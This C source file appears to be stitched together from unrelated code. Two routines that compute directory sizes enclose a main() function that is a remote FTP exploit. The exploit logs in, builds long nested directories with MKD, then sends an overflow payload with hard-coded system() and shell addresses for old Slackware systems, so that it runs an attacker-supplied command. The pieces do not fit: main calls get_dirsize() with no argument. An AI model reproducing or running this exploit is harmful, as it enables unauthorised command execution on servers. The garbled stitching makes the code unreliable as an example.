double get_dirsize(const char *pPath) { DIR *dp = opendir(pPath); if (dp == NULL) return 0; struct dirent *ep; struct stat statbuf; double size = 0; while ((ep = readdir(dp)) != NULL) { if (dot_or_dotdot(ep->d_name)) continue; char *dname = concat_path_file(pPath, ep->d_name); if (lstat(dname, &statbuf) != 0) { goto next; } if (S_ISDIR(statbuf.st_mode)) { size += get_dirsize(dname); } else if (S_ISREG(statbuf.st_mode)) { size += statbuf.st_size; } next: free(dname); } closedir(dp); return size; }
int main (int argc, char *argv[]) { if (argc < 7) { usage(argv[0]); exit(0); } sprintf(host, "%s", argv[1]); sprintf(user, "%s", argv[2]); sprintf(pass, "%s", argv[3]); sprintf(dir, "%s", argv[4]); sprintf(command, "%s", argv[5]); tipo = atoi (argv[6]); printf ( "%d\n\n", tipo); if ( argc > 7) port = atoi(argv[7]); if ( argc > 8) align = atoi(argv[8]); if (tipo <= 0) { /* 2.4(4) libc5 slack 3.4 */ systemaddr = 0x400441f0; shelladdr = 0x80604a0; } else if (tipo == 1) { /* beta 15 libc5 slack 3.4 */ systemaddr = 0x400441f0; shelladdr = 0x8062510; } else if (tipo == 2) { /* 2.4(4) libc5 slack 3.3 */ systemaddr = 0x400441f0; shelladdr = 0x805f1e4; } else { /* CUSTOM ADDRESS */ systemaddr = SYSADDR; shelladdr = EGGADDR; } sd = socket ( AF_INET, SOCK_STREAM, 0); sa.sin_family = AF_INET; sa.sin_port = htons(port); he = gethostbyname (host); if (!he) { if ( (sa.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) { printf ( "wrong ip address or unknown hostname\n"); exit(0); } } else { bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length); } if ( connect ( sd, (struct sockaddr *) &sa, sizeof(sa)) < 0) { printf ( "Cannot connect to remote host: Connection refused\n"); exit(0); } read ( sd, netbuf, sizeof(netbuf)); printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf)); /* ok. we're connected. */ strcpy ( tmp, "USER "); strcat (tmp, user); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp)); read ( sd, netbuf, sizeof(netbuf)); printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf)); /* ok. send the pass. */ strcpy ( tmp, "PASS "); strcat (tmp, pass); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp)); read ( sd, netbuf, sizeof(netbuf)); if ( netbuf[0] == '5') { printf ("Login incorrect!\n"); exit(0); } printf ( "%s\n", netbuf); #ifdef DEBUG printf ( "Ok, we're on! Press any key to exploit it\n"); gets(netbuf); #endif bzero ( &netbuf, sizeof(netbuf)); /* ok. let's get to the vulnerable dir */ strcpy ( tmp, "CWD "); strcat (tmp, dir); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp)); read ( sd, netbuf, sizeof(netbuf)); printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf)); get_dirsize(); /* gets home dir size */ todo = BSIZE - dirsize - 60 - 4; /* ok, we're on. let's get things working here! */ while(done < todo) { if((todo - done) > 255) doit = 255; else doit = todo - done; for (i = 0; i < doit; i++) buff[i] = c; buff[doit] = '\0'; strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); read ( sd, netbuf, sizeof(netbuf)); if ( netbuf[1] == '2') { printf ("error while creating the dir, let's try another name...\n\n"); c++; continue; } else done += doit; bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf)); strcpy ( tmp, "CWD "); strcat ( tmp, buff); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); read ( sd, netbuf, sizeof(netbuf)); if ( netbuf[0] == '5') { printf ("error while exploiting the remote host: Cannot cd dir!\n\n"); } bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf)); } /* prepare last one */ memset(buff, 'X', MAXLEN); for(i = align; i < 100; i += 4) { buff[i ] = systemaddr & 0x000000ff; buff[i+1] = (systemaddr & 0x0000ff00) >> 8; buff[i+2] = (systemaddr & 0x00ff0000) >> 16; buff[i+3] = (systemaddr & 0xff000000) >> 24; } buff[i++] = shelladdr & 0x000000ff; buff[i++] = (shelladdr & 0x0000ff00) >> 8; buff[i++] = (shelladdr & 0x00ff0000) >> 16; buff[i++] = (shelladdr & 0xff000000) >> 24; strcat(command, ";"); memcpy(buff+140, command, strlen(command)); buff[MAXLEN] = '\0'; strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); read ( sd, netbuf, sizeof(netbuf)); bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf)); /* ok. */ printf ( "Exploiting %s\n", dir); printf ( "Using 0x%x(system) and 0x%x(command), alignment = %d, port = %d\n", systemaddr, shelladdr, align, port); printf("\nI guess you're a hax0r now :D.\n"); close (sd); }
double get_dirsize_find_largest_dir( const char *pPath, char **worst_dir, const char *excluded) { if (worst_dir) *worst_dir = NULL; DIR *dp = opendir(pPath); if (dp == NULL) return 0; time_t cur_time = time(NULL); struct dirent *ep; struct stat statbuf; double size = 0; double maxsz = 0; while ((ep = readdir(dp)) != NULL) { if (dot_or_dotdot(ep->d_name)) continue; char *dname = concat_path_file(pPath, ep->d_name); if (lstat(dname, &statbuf) != 0) { goto next; } if (S_ISDIR(statbuf.st_mode)) { double sz = get_dirsize(dname); size += sz; if (worst_dir && (!excluded || strcmp(excluded, ep->d_name) != 0)) { /* Calculate "weighted" size and age * w = sz_kbytes * age_mins */ sz /= 1024; long age = (cur_time - statbuf.st_mtime) / 60; if (age > 0) sz *= age; if (sz > maxsz) { if (!this_is_a_dd(dname)) { VERB1 log("'%s' isn't a problem directory, probably a stray directory?", dname); } else { maxsz = sz; free(*worst_dir); *worst_dir = xstrdup(ep->d_name); } } } } else if (S_ISREG(statbuf.st_mode)) { size += statbuf.st_size; } next: free(dname); } closedir(dp); return size; }